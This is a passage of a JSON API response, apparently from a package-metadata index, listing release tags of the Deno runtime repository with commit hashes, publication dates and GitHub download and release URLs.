0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":n